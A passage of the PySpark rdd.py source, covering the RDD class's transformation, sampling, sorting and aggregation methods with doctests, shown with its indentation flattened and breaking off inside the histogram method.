# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
# The RDD materialization time is unpredicable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sock.makefile("rb", 65536))
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
